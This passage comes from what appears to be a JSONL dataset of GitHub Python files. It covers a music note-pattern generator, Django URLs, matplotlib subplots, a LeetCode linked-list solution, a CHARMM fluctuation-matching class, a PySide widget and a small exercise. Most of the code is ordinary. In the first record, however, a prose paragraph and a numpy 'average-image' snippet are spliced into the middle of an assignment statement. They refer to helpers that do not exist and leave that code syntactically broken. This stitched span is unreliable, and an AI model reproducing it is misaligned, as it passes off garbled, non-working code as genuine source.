num_patterns]\n spec = self.gen_spec.instantiate_me(composition, bar)\n\n bar_end_volume = int(spec[\"volume\"])\n volume_diff = 0 if bar_start_volume is None else bar_end_volume - bar_start_volume\n if bar.note_sequences is None:\n bar.note_sequences = []\n volume = bar_end_volume if bar_start_volume is None else bar_start_volume + (\n (chord.timing.start64th / 64) * volume_diff)\n volume = int(volume)\n\n note_sequence = NoteSequence(note_sequence_num=NoteSequence.next_note_sequence_num,\n instrument_num=spec[\"instrument_num\"], voice_id=spec[\"voice_id\"],\n track_num=spec[\"track_num\"], channel_num=spec[\"channel_num\"],\n notes=[], bar_num=bar.bar_num)\n composition.note_sequences_hash[note_sequence.note_sequence_num] = note_sequence\n bar.note_sequences.append(note_sequence)\n\n for chord_num in bar.chord_nums:\n chord = composition.chords_hash[chord_num]\n notes = self.get_notes_for_pattern(spec, note_sequence.note_sequence_num, note_sequence.bar_num,\n chord, pattern, volume)\n note_sequence.notes.extend(notes)\n\n VolumeUtils.change_volumes(spec, previous_spec, bar, note_sequence)\n\n bar_start_volume = bar_end_volume\n NoteSequence.next_note_sequence_num += 1\n previous_spec = spec\n\n return composition\n\n def get_pattern(self):\n pattern = MelodyPattern([], [], [])\n num_notes = 
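The average-image helpers above loop over the stack one image at a time; with numpy broadcasting the same mean removal collapses to a few vectorised lines, matching the loop version up to its astype(int) truncation of the average:

import numpy as np

def remove_average_vectorized(data):
    # data: stack of images, shape (n, h, w)
    avg = data.mean(axis=0)                   # per-pixel mean image
    out = data.astype(np.float64) - avg.astype(int)
    np.clip(out, 0, None, out=out)            # clamp negatives to 0, as above
    return out, avg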
self.gen_spec.get_value(\"num_notes_in_pattern\")\n while len(pattern.intervals) < num_notes:\n interval = random.randint(0, 7)\n diff = 0 if len(pattern.intervals) == 0 else abs(pattern.intervals[-1] - interval)\n if diff <= 8 and (len(pattern.intervals) == 0 or interval != pattern.intervals[-1]):\n pattern.intervals.append(interval)\n pattern.timing_fractions = [1/len(pattern.intervals) for i in range(0, len(pattern.intervals))]\n num_rests = self.gen_spec.get_value(\"num_pattern_rests\")\n while len(pattern.rests) < num_rests:\n rest_pos = random.randint(0, len(pattern.intervals))\n if rest_pos not in pattern.rests:\n pattern.rests.append(rest_pos)\n return pattern\n\n def get_notes_for_pattern(self, spec, note_sequence_num, bar_num, chord, pattern, volume):\n notes = []\n s64 = 0\n focal_pitch = spec[\"focal_pitch\"]\n for note_num in range(0, len(pattern.intervals)):\n pitch = MusicUtils.get_note_from_chord_interval(chord, focal_pitch, pattern.intervals[note_num])\n d64 = int(pattern.timing_fractions[note_num] * chord.timing.duration64ths)\n timing = Timing(chord.timing.start64th + s64, d64)\n note = Note(pitch=pitch, volume=volume, note_type=\"backbone\",\n timing=timing, chord_num=chord.chord_num,\n note_sequence_num=note_sequence_num, bar_num=bar_num, track_note_num=None,\n tags={})\n s64 += d64\n if note_num not in pattern.rests:\n notes.append(note)\n return notes\n","repo_name":"simoncolton/Parley","sub_path":"ParleyV2/Generators/PatternNoteSequenceGenerator.py","file_name":"PatternNoteSequenceGenerator.py","file_ext":"py","file_size_in_byte":4283,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"32176701980","text":"from django.urls import path\n\nfrom . import views\n\napp_name = 'index'\nurlpatterns = [\n path('', views.index, name='index'),\n path('logout/', views.logout, name='logout'),\n path('signup/', views.signup, name='signup'),\n path('signin/', views.signin, name='signin'),\n]","repo_name":"IllIlIlIllllII/Unist_db_team7","sub_path":"BBGG/index/urls.py","file_name":"urls.py","file_ext":"py","file_size_in_byte":278,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"37747275033","text":"#!/usr/bin/env python2.7\n\n'''\nThis script demonstrates how to make a grid of subplots.\n'''\n\n### References\n# guide for laying out grids of plots\n# - http://matplotlib.org/users/tight_layout_guide.html\n\nimport numpy as np\nimport matplotlib.pyplot as plt\n\ndef decorateAxes(ax, title):\n '''\n Decorates Axes for a plot of 2D Lorentzians\n '''\n\n ax.set_title(title)\n ax.set_xlabel(\"x\")\n ax.set_ylabel(\"y\")\n\n\n# set up data\n\ndim = 211\n\nx = np.linspace(0, 10*np.pi, dim)\n\n# y data are stored in a 2D array\ny = np.zeros((4, dim))\ny[0,:] = np.sin(x)\ny[1,:] = np.cos(x)\ny[2,:] = np.tan(x)\ny[3,:] = np.exp(x)\n\n# set up plot\n\nfig, axes = plt.subplots(2,2) # returns figure and 2x2 numpy array of Axes objects\n\naxes[0, 0].plot(x, y[0, :])\ndecorateAxes(axes[0, 0], \"Sine\")\naxes[0, 1].plot(x, y[1, :])\ndecorateAxes(axes[0, 1], \"Cosine\")\naxes[1, 0].plot(x, y[2, :])\ndecorateAxes(axes[1, 0], \"TANGENT\")\naxes[1, 1].plot(x, y[3, :])\ndecorateAxes(axes[1, 1], \"Exponential\")\n\nplt.title(\"foo\")\n\nplt.tight_layout() # prevents plot labels from overlapping\n\nplt.show()\n\n\n\n### Another way to do it\n\n# list of titles for plots (order is left to right in each row)\ntitles = [\"Sine\", \"Cosine\", \"TANGENT\", \"Exponential\"]\n\nfig, axes = 
plt.subplots(2,2)\n\n# `enumerate` lets you iterate over a list and its index.\n# `zip` lets you iterate over multiple lists.\n# `enumerate(zip(*)) iterates over multiple lists, plus an index\n# `axes.flat` converts the 2D numpy array to a 1D numpy array\nfor ii, (ax, title) in enumerate(zip(axes.flat, titles)):\n ax.plot(x, y[ii,:])\n decorateAxes(ax, title)\n\nplt.tight_layout()\n\nplt.show()","repo_name":"Seideman-Group/pythonMinicourse","sub_path":"Day3-Plotting/plottingExamples/subplots.py","file_name":"subplots.py","file_ext":"py","file_size_in_byte":1611,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"31"} +{"seq_id":"31096952034","text":"#\n# @lc app=leetcode.cn id=25 lang=python3\n#\n# [25] K 个一组翻转链表\n#\n# https://leetcode-cn.com/problems/reverse-nodes-in-k-group/description/\n#\n# algorithms\n# Hard (58.07%)\n# Likes: 614\n# Dislikes: 0\n# Total Accepted: 77.2K\n# Total Submissions: 125.5K\n# Testcase Example: '[1,2,3]\\n2'\n#\n# 给你一个链表,每 k 个节点一组进行翻转,请你返回翻转后的链表。\n#\n# k 是一个正整数,它的值小于或等于链表的长度。\n#\n# 如果节点总数不是 k 的整数倍,那么请将最后剩余的节点保持原有顺序。\n#\n#\n#\n# 示例:\n#\n# 给你这个链表:1->2->3->4->5\n#\n# 当 k = 2 时,应当返回: 2->1->4->3->5\n#\n# 当 k = 3 时,应当返回: 3->2->1->4->5\n#\n#\n#\n# 说明:\n#\n#\n# 你的算法只能使用常数的额外空间。\n# 你不能只是单纯的改变节点内部的值,而是需要实际进行节点交换。\n#\n#\n#\n\n# @lc code=start\n# Definition for singly-linked list.\n# class ListNode:\n# def __init__(self, x):\n# self.val = x\n# self.next = None\n\nclass Solution:\n def reverseKGroup(self, head: ListNode, k: int) -> ListNode:\n\n # 迭代\n # 头\n if not head:\n return head\n ans = head\n for i in range(k-1):\n ans = ans.next\n if not ans:\n return head\n while head:\n pre,cur = None,head\n for i in range(k):\n cur.next,cur,pre = pre,cur.next,cur\n # 检查剩余元素\n c = cur\n if not c:\n return ans\n for i in range(k-1):\n c = c.next\n if not c:\n head.next = cur\n return ans\n head.next = c\n head = cur\n return ans\n \n # 递归\n if not head:\n return head\n cur = head\n for i in range(k-1):\n cur = cur.next\n if not cur:\n return head\n pre, cur = self.reverseKGroup(cur.next, k), head\n for i in range(k):\n cur.next, cur, pre = pre, cur.next, cur\n return pre\n\n# @lc code=end\n","repo_name":"kailunfan/lcode","sub_path":"25.k-个一组翻转链表.py","file_name":"25.k-个一组翻转链表.py","file_ext":"py","file_size_in_byte":2174,"program_lang":"python","lang":"zh","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"22384870732","text":"from __future__ import (\n absolute_import,\n division,\n print_function,\n unicode_literals,\n)\nfrom future.builtins import (\n dict,\n open,\n range,\n super,\n)\nfrom future.utils import (\n PY2,\n native_str,\n raise_with_traceback,\n)\n\nimport copy\nimport logging\nimport os\nimport subprocess\nimport textwrap\nimport time\nfrom os import path\n\nimport numpy as np\nimport pandas as pd\nfrom scipy import constants\nimport MDAnalysis as mda\nfrom MDAnalysis.lib import util\nfrom MDAnalysis.coordinates.core import reader\nfrom fluctmatch.fluctmatch import base as fmbase\nfrom fluctmatch.fluctmatch import utils as fmutils\nfrom fluctmatch.fluctmatch.data import (\n charmm_init,\n charmm_nma,\n charmm_thermo,\n)\nfrom fluctmatch.intcor import utils as icutils\nfrom fluctmatch.parameter import utils as prmutils\n\nif PY2:\n FileNotFoundError = IOError\n\nlogger = logging.getLogger(__name__)\n\n\nclass CharmmFluctMatch(fmbase.FluctMatch):\n \"\"\"Fluctuation matching using CHARMM.\"\"\"\n bond_def = [\"I\", \"J\"]\n error_hdr = [\"step\", \"Kb_rms\", \"fluct_rms\", \"b0_rms\"]\n\n def 
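The pointer dance in the iterative list solution above, cur.next, cur, pre = pre, cur.next, cur, works because Python evaluates the whole right-hand tuple before assigning the left-hand targets one by one, left to right. Isolated into a plain linked-list reversal:

class ListNode:
    def __init__(self, x):
        self.val = x
        self.next = None

def reverse_list(head):
    pre, cur = None, head
    while cur:
        # RHS (pre, cur.next, cur) is built first, then assigned left to right:
        # cur.next -> old pre, cur -> old cur.next, pre -> old cur
        cur.next, cur, pre = pre, cur.next, cur
    return pre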
__init__(self, *args, **kwargs):\n \"\"\"Initialization of fluctuation matching using the CHARMM program.\n\n Parameters\n ----------\n topology : filename or Topology object\n A CHARMM/XPLOR PSF topology file, PDB file or Gromacs GRO file;\n used to define the list of atoms. If the file includes bond\n information, partial charges, atom masses, ... then these data will\n be available to MDAnalysis. A \"structure\" file (PSF, PDB or GRO, in\n the sense of a topology) is always required. Alternatively, an\n existing :class:`MDAnalysis.core.topology.Topology` instance may\n also be given.\n topology_format\n Provide the file format of the topology file; ``None`` guesses it\n from the file extension [``None``] Can also pass a subclass of\n :class:`MDAnalysis.topology.base.TopologyReaderBase` to define a\n custom reader to be used on the topology file.\n format\n Provide the file format of the coordinate or trajectory file;\n ``None`` guesses it from the file extension. Note that this keyword\n has no effect if a list of file names is supplied because the\n \"chained\" reader has to guess the file format for each individual\n list member. [``None``] Can also pass a subclass of\n :class:`MDAnalysis.coordinates.base.ProtoReader` to define a custom\n reader to be used on the trajectory file.\n guess_bonds : bool, optional\n Once Universe has been loaded, attempt to guess the connectivity\n between atoms. This will populate the .bonds .angles and .dihedrals\n attributes of the Universe.\n vdwradii : dict, optional\n For use with *guess_bonds*. Supply a dict giving a vdwradii for each\n atom type which are used in guessing bonds.\n is_anchor : bool, optional\n When unpickling instances of\n :class:`MDAnalysis.core.groups.AtomGroup` existing Universes are\n searched for one where to anchor those atoms. Set to ``False`` to\n prevent this Universe from being considered. [``True``]\n anchor_name : str, optional\n Setting to other than ``None`` will cause\n :class:`MDAnalysis.core.groups.AtomGroup` instances pickled from\n the Universe to only unpickle if a compatible Universe with matching\n *anchor_name* is found. 
Even if *anchor_name* is set *is_anchor*\n will still be honored when unpickling.\n in_memory\n After reading in the trajectory, transfer it to an in-memory\n representations, which allow for manipulation of coordinates.\n in_memory_step\n Only read every nth frame into in-memory representation.\n outdir\n Output directory\n temperature\n Temperature (in K)\n rmin\n Minimum distance to consider for bond lengths.\n rmax\n Maximum distance to consider for bond lengths.\n charmm_version\n Version of CHARMM for formatting (default: 41)\n extended\n Use the extended format.\n title\n Title lines at the beginning of the file.\n resid\n Include segment IDs in the internal coordinate files.\n nonbonded\n Include the nonbonded section in the parameter file.\n \"\"\"\n super().__init__(*args, **kwargs)\n self.dynamic_params = dict()\n self.filenames = dict(\n init_input=path.join(self.outdir, \"fluctinit.inp\"),\n init_log=path.join(self.outdir, \"fluctinit.log\"),\n init_avg_ic=path.join(self.outdir, \"init.average.ic\"),\n init_fluct_ic=path.join(self.outdir, \"init.fluct.ic\"),\n avg_ic=path.join(self.outdir, \"average.ic\"),\n fluct_ic=path.join(self.outdir, \"fluct.ic\"),\n dynamic_prm=path.join(self.outdir, \"{}.dist.prm\".format(\n self.prefix)),\n fixed_prm=path.join(self.outdir, \".\".join((self.prefix, \"prm\"))),\n psf_file=path.join(self.outdir, \".\".join((self.prefix, \"psf\"))),\n xplor_psf_file=path.join(self.outdir, \".\".join((self.prefix,\n \"xplor\", \"psf\"))),\n crd_file=path.join(self.outdir, \".\".join((self.prefix, \"cor\"))),\n stream_file=path.join(self.outdir, \".\".join((self.prefix,\n \"stream\"))),\n topology_file=path.join(self.outdir, \".\".join((self.prefix,\n \"rtf\"))),\n nma_crd=path.join(self.outdir, \".\".join((self.prefix, \"mini\",\n \"cor\"))),\n nma_vib=path.join(self.outdir, \".\".join((self.prefix, \"vib\"))),\n charmm_input=path.join(self.outdir, \".\".join((self.prefix,\n \"inp\"))),\n charmm_log=path.join(self.outdir, \".\".join((self.prefix, \"log\"))),\n error_data=path.join(self.outdir, \"error.dat\"),\n thermo_input=path.join(self.outdir, \"thermo.inp\"),\n thermo_log=path.join(self.outdir, \"thermo.log\"),\n thermo_data=path.join(self.outdir, \"thermo.dat\"),\n traj_file=self.args[1] if len(self.args) > 1 else path.join(self.outdir, \"cg.dcd\"),\n bond_convergence=path.join(self.outdir, \"bond_convergence.txt\")\n )\n\n # Boltzmann constant\n self.BOLTZ = self.temperature * (constants.k * constants.N_A /\n (constants.calorie * constants.kilo))\n\n # Bond factor mol^2-Ang./kcal^2\n self.KFACTOR = 0.02\n\n # Self consistent error information.\n self.error = pd.DataFrame(\n np.zeros((1, len(self.error_hdr)), dtype=np.int),\n columns=self.error_hdr,\n )\n\n def _create_ic_table(self, universe, data):\n data.set_index(self.bond_def, inplace=True)\n table = icutils.create_empty_table(universe.atoms)\n hdr = table.columns\n table.set_index(self.bond_def, inplace=True)\n table.drop(\n [\n \"r_IJ\",\n ], axis=1, inplace=True)\n table = pd.concat([table, data[\"r_IJ\"]], axis=1)\n return table.reset_index()[hdr]\n\n def initialize(self, nma_exec=None, restart=False):\n \"\"\"Create an elastic network model from a basic coarse-grain model.\n\n Parameters\n ----------\n nma_exec : str\n executable file for normal mode analysis\n restart : bool, optional\n Reinitialize the object by reading files instead of doing initial\n calculations.\n \"\"\"\n self.restart = restart\n if not self.restart:\n # Write CHARMM input file.\n if not 
path.exists(self.filenames[\"init_input\"]):\n version = self.kwargs.get(\"charmm_version\", 41)\n dimension = (\n \"dimension chsize 1000000\" if version >= 36 else \"\")\n with open(\n self.filenames[\"init_input\"], mode=\"wb\") as charmm_file:\n logger.info(\"Writing CHARMM input file.\")\n charmm_inp = charmm_init.init.format(\n flex=\"flex\" if version else \"\",\n version=version,\n dimension=dimension,\n **self.filenames)\n charmm_inp = textwrap.dedent(charmm_inp[1:])\n charmm_file.write(charmm_inp.encode())\n\n charmm_exec = (os.environ.get(\"CHARMMEXEC\", util.which(\"charmm\"))\n if nma_exec is None else nma_exec)\n with open(self.filenames[\"init_log\"], \"w\") as log_file:\n subprocess.check_call(\n [charmm_exec, \"-i\", self.filenames[\"init_input\"]],\n stdout=log_file,\n stderr=subprocess.STDOUT,\n )\n\n # Write the parameter files.\n with reader(self.filenames[\"init_fluct_ic\"]) as icfile:\n std_bonds = icfile.read().set_index(self.bond_def)\n with reader(self.filenames[\"init_avg_ic\"]) as icfile:\n avg_bonds = icfile.read().set_index(self.bond_def)\n target = pd.concat([std_bonds[\"r_IJ\"], avg_bonds[\"r_IJ\"]], axis=1)\n target.reset_index(inplace=True)\n logger.info(\"Calculating the initial CHARMM parameters...\")\n universe = mda.Universe(\n self.filenames[\"xplor_psf_file\"], self.filenames[\"crd_file\"]\n )\n self.target = prmutils.create_empty_parameters(universe, **self.kwargs)\n target.columns = self.target[\"BONDS\"].columns\n self.target[\"BONDS\"] = target.copy(deep=True)\n self.parameters = copy.deepcopy(self.target)\n self.parameters[\"BONDS\"][\"Kb\"] = (\n self.BOLTZ / self.parameters[\"BONDS\"][\"Kb\"].apply(np.square))\n self.dynamic_params = copy.deepcopy(self.parameters)\n with mda.Writer(self.filenames[\"fixed_prm\"], **self.kwargs) as prm:\n logger.info(\"Writing {}...\".format(\n self.filenames[\"fixed_prm\"]))\n prm.write(self.parameters)\n with mda.Writer(self.filenames[\"dynamic_prm\"],\n **self.kwargs) as prm:\n logger.info(\"Writing {}...\".format(\n self.filenames[\"dynamic_prm\"]))\n prm.write(self.dynamic_params)\n else:\n print(\"FM Restarted\")\n if not path.exists(self.filenames[\"fixed_prm\"]):\n self.initialize(nma_exec, restart=False)\n try:\n # Read the parameter files.\n logger.info(\"Loading parameter and internal coordinate files.\")\n with reader(self.filenames[\"fixed_prm\"]) as fixed:\n self.parameters.update(fixed.read())\n with reader(self.filenames[\"dynamic_prm\"]) as dynamic:\n self.dynamic_params.update(dynamic.read())\n\n # Read the initial internal coordinate files.\n with reader(self.filenames[\"init_avg_ic\"]) as init_avg:\n avg_table = init_avg.read().set_index(\n self.bond_def)[\"r_IJ\"]\n\n with reader(self.filenames[\"init_fluct_ic\"]) as init_fluct:\n fluct_table = (init_fluct.read().set_index(\n self.bond_def)[\"r_IJ\"])\n table = pd.concat([fluct_table, avg_table], axis=1)\n\n # Set the target fluctuation values.\n logger.info(\"Files loaded successfully...\")\n self.target = copy.deepcopy(self.parameters)\n self.target[\"BONDS\"].set_index(self.bond_def, inplace=True)\n cols = self.target[\"BONDS\"].columns\n table.columns = cols\n self.target[\"BONDS\"] = table.copy(deep=True).reset_index()\n\n except (FileNotFoundError, IOError):\n raise_with_traceback(\n (IOError(\"Some files are missing. 
Unable to restart.\")))\n\n def run(self, nma_exec=None, tol=1.e-3, n_cycles=300, low_bound=0.):\n \"\"\"Perform a self-consistent fluctuation matching.\n\n Parameters\n ----------\n nma_exec : str\n executable file for normal mode analysis\n tol : float, optional\n fluct difference tolerance\n n_cycles : int, optional\n number of fluctuation matching cycles\n low_bound : float, optional\n lowest Kb values to reduce noise\n \"\"\"\n # Find CHARMM executable\n charmm_exec = (os.environ.get(\"CHARMMEXEC\", util.which(\"charmm\"))\n if nma_exec is None else nma_exec)\n if charmm_exec is None:\n logger.exception(\n \"Please set CHARMMEXEC with the location of your CHARMM \"\n \"executable file or add the charmm path to your PATH \"\n \"environment.\")\n raise_with_traceback(\n OSError(\n \"Please set CHARMMEXEC with the location of your CHARMM \"\n \"executable file or add the charmm path to your PATH \"\n \"environment.\"))\n\n # Read the parameters\n if not self.parameters:\n try:\n self.initialize(nma_exec, restart=True)\n except IOError:\n raise_with_traceback(\n (IOError(\"Some files are missing. Unable to restart.\")))\n\n # Write CHARMM input file.\n if not path.exists(self.filenames[\"charmm_input\"]):\n version = self.kwargs.get(\"charmm_version\", 41)\n dimension = (\"dimension chsize 1000000\" if version >= 36 else \"\")\n with open(\n self.filenames[\"charmm_input\"], mode=\"wb\") as charmm_file:\n logger.info(\"Writing CHARMM input file.\")\n charmm_inp = charmm_nma.nma.format(\n temperature=self.temperature,\n flex=\"flex\" if version else \"\",\n version=version,\n dimension=dimension,\n **self.filenames)\n charmm_inp = textwrap.dedent(charmm_inp[1:])\n charmm_file.write(charmm_inp.encode())\n\n # Set the indices for the parameter tables.\n self.target[\"BONDS\"].set_index(self.bond_def, inplace=True)\n bond_values = self.target[\"BONDS\"].columns\n\n # Check for restart.\n try:\n if os.stat(self.filenames[\"error_data\"]).st_size > 0:\n with open(self.filenames[\"error_data\"], \"rb\") as data:\n error_info = pd.read_csv(\n data,\n header=0,\n skipinitialspace=True,\n delim_whitespace=True)\n if not error_info.empty:\n self.error[\"step\"] = error_info[\"step\"].values[-1]\n else:\n raise FileNotFoundError\n except (FileNotFoundError, OSError):\n with open(self.filenames[\"error_data\"], \"wb\") as data:\n np.savetxt(\n data, [\n self.error_hdr,\n ],\n fmt=native_str(\"%15s\"), # Nix\n delimiter=native_str(\"\"))\n self.error[\"step\"] += 1\n\n # Initiate an all true index data, for preserving bond convergence\n if not self.restart:\n temp = ~self.target[\"BONDS\"][\"Kb\"].isna()\n temp = temp.reset_index()\n self.converge_bnd_list = temp.iloc[:, 2]\n\n # Start self-consistent iteration for Fluctuation Matching\n # Run simulation\n logger.info(f\"Starting fluctuation matching--{n_cycles} iterations to run\")\n if low_bound != 0.:\n logger.info(f\"Lower bound after 75% iteration is set to {low_bound}\")\n st = time.time()\n fdiff = []\n for i in range(n_cycles):\n ct = time.time()\n self.error[\"step\"] = i + 1\n with open(self.filenames[\"charmm_log\"], \"w\") as log_file:\n subprocess.check_call(\n [charmm_exec, \"-i\", self.filenames[\"charmm_input\"]],\n stdout=log_file,\n stderr=subprocess.STDOUT,\n )\n self.dynamic_params[\"BONDS\"].set_index(self.bond_def, inplace=True)\n self.parameters[\"BONDS\"].set_index(self.bond_def, inplace=True)\n\n # Read the average bond distance.\n with reader(self.filenames[\"avg_ic\"]) as icavg:\n avg_ic = 
icavg.read().set_index(self.bond_def)[\"r_IJ\"]\n\n # Read the bond fluctuations.\n with reader(self.filenames[\"fluct_ic\"]) as icfluct:\n fluct_ic = icfluct.read().set_index(self.bond_def)[\"r_IJ\"]\n\n vib_ic = pd.concat([fluct_ic, avg_ic], axis=1)\n vib_ic.columns = bond_values\n logger.info(f\"Checking for bondlist convergence\")\n fluct_diff = np.abs(vib_ic[bond_values[0]] - self.target[\"BONDS\"][bond_values[0]])\n fdiff.append(fluct_diff)\n fluct_diff = fluct_diff.reset_index()\n tmp = self.parameters[\"BONDS\"][bond_values[0]].reset_index()\n\n if not self.restart:\n self.converge_bnd_list &= ((fluct_diff.iloc[:, 2] > tol) & (tmp.iloc[:, 2] > 0))\n else:\n if i == 0:\n self.converge_bnd_list = ((fluct_diff.iloc[:, 2] > tol) & (tmp.iloc[:, 2] > 0))\n else:\n self.converge_bnd_list &= ((fluct_diff.iloc[:, 2] > tol) & (tmp.iloc[:, 2] > 0))\n\n # Calculate the r.m.s.d. between fluctuation and distances\n # compared with the target values.\n vib_error = self.target[\"BONDS\"] - vib_ic\n vib_error = vib_error.apply(np.square).mean(axis=0)\n vib_error = np.sqrt(vib_error)\n self.error[self.error.columns[-2:]] = vib_error.T.values\n\n # Calculate the new force constant.\n optimized = vib_ic.apply(np.reciprocal).apply(np.square)\n target = self.target[\"BONDS\"].apply(np.reciprocal).apply(np.square)\n optimized -= target\n optimized *= self.BOLTZ * self.KFACTOR\n\n # update bond list\n vib_ic[bond_values[0]] = (self.parameters[\"BONDS\"][bond_values[0]]\n - optimized[bond_values[0]])\n vib_ic[bond_values[0]] = (\n vib_ic[bond_values[0]].where(vib_ic[bond_values[0]] >= 0., 0.)) # set negative to zero\n\n if low_bound > 0. and i > int(n_cycles * 0.75):\n logger.info(f\"Fluctuation matching cycle {i}: low bound is {low_bound}\")\n vib_ic[bond_values[0]] = (vib_ic[bond_values[0]].where(vib_ic[bond_values[0]] >= low_bound, 0.))\n\n # r.m.s.d. 
between previous and current force constant\n diff = self.dynamic_params[\"BONDS\"] - vib_ic\n diff = diff.apply(np.square).mean(axis=0)\n diff = np.sqrt(diff)\n self.error[self.error.columns[1]] = diff.values[0]\n\n # Update the parameters and write to file.\n self.parameters[\"BONDS\"][bond_values[0]] = vib_ic[bond_values[0]]\n self.dynamic_params[\"BONDS\"][bond_values[0]] = vib_ic[bond_values[0]]\n self.dynamic_params[\"BONDS\"][bond_values[1]] = vib_ic[bond_values[1]]\n\n self.parameters[\"BONDS\"].reset_index(inplace=True)\n self.dynamic_params[\"BONDS\"].reset_index(inplace=True)\n with mda.Writer(self.filenames[\"fixed_prm\"], **self.kwargs) as prm:\n prm.write(self.parameters)\n with mda.Writer(self.filenames[\"dynamic_prm\"],\n **self.kwargs) as prm:\n prm.write(self.dynamic_params)\n\n # Update the error values.\n with open(self.filenames[\"error_data\"], \"ab\") as error_file:\n np.savetxt(\n error_file,\n self.error,\n fmt=native_str(\"%15d%15.6f%15.6f%15.6f\", ), # Nix\n delimiter=native_str(\"\"),\n )\n logger.info(\"Fluctuation matching cycle {} completed in {:.6f}\".format(\n i, time.time() - ct))\n logger.info(f\"{self.converge_bnd_list.sum()} not converged out of {len(self.converge_bnd_list)}\")\n\n if self.converge_bnd_list.sum() <= len(self.converge_bnd_list.values.tolist()) * 0.003:\n # if bonds to converge is less than 0.3% of total bonds, use relative difference as criteria\n # as it takes more than 100 iterations for these 0.3% bonds to converge.\n relative_diff = (fluct_diff.iloc[:, 2] - tol) / tol\n\n ### To know the late converged bonds uncomment the below 5 lines ###\n\n # late_converged = pd.DataFrame()\n # indx = self.converge_bnd_list[self.converge_bnd_list].index.values\n # late_converged = pd.concat([fluct_diff.loc[indx], relative_diff.loc[indx]], axis=1)\n # late_converged.columns = [\"I\", \"J\", \"fluct_diff_Kb\", \"relative_diff_kb\"]\n # print(late_converged)\n\n self.converge_bnd_list = self.converge_bnd_list & (relative_diff > 5)\n if self.converge_bnd_list.sum() == 0:\n logger.info(\"Checking relative difference: All bonds converged, exiting\")\n break\n fluct_conv = pd.concat(fdiff, axis=1).round(6)\n fluct_conv.columns = [j for j in range(1, i + 2)]\n fluct_conv.to_csv(self.filenames[\"bond_convergence\"])\n logger.info(\"Fluctuation matching completed in {:.6f}\".format(\n time.time() - st))\n self.target[\"BONDS\"].reset_index(inplace=True)\n\n def calculate_thermo(self, nma_exec=None):\n \"\"\"Calculate the thermodynamic properties of the trajectory.\n\n Parameters\n ----------\n nma_exec : str\n executable file for normal mode analysis\n \"\"\"\n # Find CHARMM executable\n charmm_exec = (os.environ.get(\"CHARMMEXEC\", util.which(\"charmm\"))\n if nma_exec is None else nma_exec)\n if charmm_exec is None:\n logger.exception(\n \"Please set CHARMMEXEC with the location of your CHARMM \"\n \"executable file or add the charmm path to your PATH \"\n \"environment.\")\n raise_with_traceback(\n OSError(\n \"Please set CHARMMEXEC with the location of your CHARMM \"\n \"executable file or add the charmm path to your PATH \"\n \"environment.\"))\n\n if not path.exists(self.filenames[\"thermo_input\"]):\n version = self.kwargs.get(\"charmm_version\", 41)\n dimension = (\"dimension chsize 500000 maxres 3000000\"\n if version >= 36 else \"\")\n with open(\n self.filenames[\"thermo_input\"], mode=\"wb\") as charmm_file:\n logger.info(\"Writing CHARMM input file.\")\n charmm_inp = charmm_thermo.thermodynamics.format(\n trajectory=path.join(self.outdir, 
self.args[-1]),\n temperature=self.temperature,\n flex=\"flex\" if version else \"\",\n version=version,\n dimension=dimension,\n **self.filenames)\n charmm_inp = textwrap.dedent(charmm_inp[1:])\n charmm_file.write(charmm_inp.encode())\n\n # Calculate thermodynamic properties of the trajectory.\n with open(self.filenames[\"thermo_log\"], \"w\") as log_file:\n logger.info(\"Running thermodynamic calculation.\")\n subprocess.check_call(\n [charmm_exec, \"-i\", self.filenames[\"thermo_input\"]],\n stdout=log_file,\n stderr=subprocess.STDOUT,\n )\n logger.info(\"Calculations completed.\")\n\n header = (\"SEGI RESN RESI Entropy Enthalpy \"\n \"Heatcap Atm/res Ign.frq\")\n columns = np.array(header.split())\n columns[:3] = np.array([\"segidI\", \"RESN\", \"resI\"])\n thermo = []\n\n # Read log file (text mode so str.find works against the str header)\n with open(self.filenames[\"thermo_log\"], \"r\") as log_file:\n logger.info(\"Reading CHARMM log file.\")\n for line in log_file:\n if line.find(header) < 0:\n continue\n break\n for line in log_file:\n if len(line.strip().split()) == 0:\n break\n thermo.append(line.strip().split())\n\n # Create human-readable table\n thermo = pd.DataFrame(thermo, columns=columns)\n thermo.drop([\"RESN\", \"Atm/res\", \"Ign.frq\"], axis=1, inplace=True)\n thermo.set_index([\"segidI\", \"resI\"], inplace=True)\n thermo = thermo.astype(float)\n\n # Write data to file\n with open(self.filenames[\"thermo_data\"], \"wb\") as data_file:\n logger.info(\"Writing thermodynamics data file.\")\n thermo = thermo.to_csv(\n index=True,\n sep=native_str(\" \"),\n float_format=native_str(\"%.4f\"),\n encoding=\"utf-8\")\n data_file.write(thermo.encode())\n","repo_name":"nixnmtm/SMSL","sub_path":"src/fluctmatch/fluctmatch/charmmfluctmatch.py","file_name":"charmmfluctmatch.py","file_ext":"py","file_size_in_byte":25736,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"31"} +{"seq_id":"72518590489","text":"from src.application.infra.pyside.ui.core import QRadioButton\n\n\nclass CustomRadioButtom(QRadioButton):\n def __init__(self, parent=None, name: str = None):\n super(CustomRadioButtom, self).__init__(parent)\n print(name)\n self.setObjectName(u\"radio_\"+name)\n self.setText(name)\n self.setStyleSheet(\"color: black;\")\n\n def clear_object(self):\n return","repo_name":"danieldevpy/ordem-de-servico","sub_path":"src/application/infra/pyside/widgets/custom_radio_button.py","file_name":"custom_radio_button.py","file_ext":"py","file_size_in_byte":391,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"1451642946","text":"\"\"\"\nCP1404/CP5632 - Practical\nBroken program to determine score status\n\"\"\"\n\n\ndef main():\n score = float(input(\"Enter score: \"))\n print(determine_status(score))\n\n\ndef determine_status(score):\n result = 0\n if score < 0:\n return 'Invalid score'\n elif score > 100:\n return 'Invalid score'\n else:\n if 90 > score >= 50:\n result = \"Passable\"\n if score >= 90:\n result = \"Excellent\"\n if score < 50:\n result = \"Bad\"\n return result\n\n\nmain()\n","repo_name":"ironmatt4x4/cp1404practicals","sub_path":"prac_03/broken_score.py","file_name":"broken_score.py","file_ext":"py","file_size_in_byte":577,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"31"} +{"seq_id":"31326740079","text":"from __future__ import absolute_import, division, print_function, unicode_literals\nimport tensorflow as tf\nimport 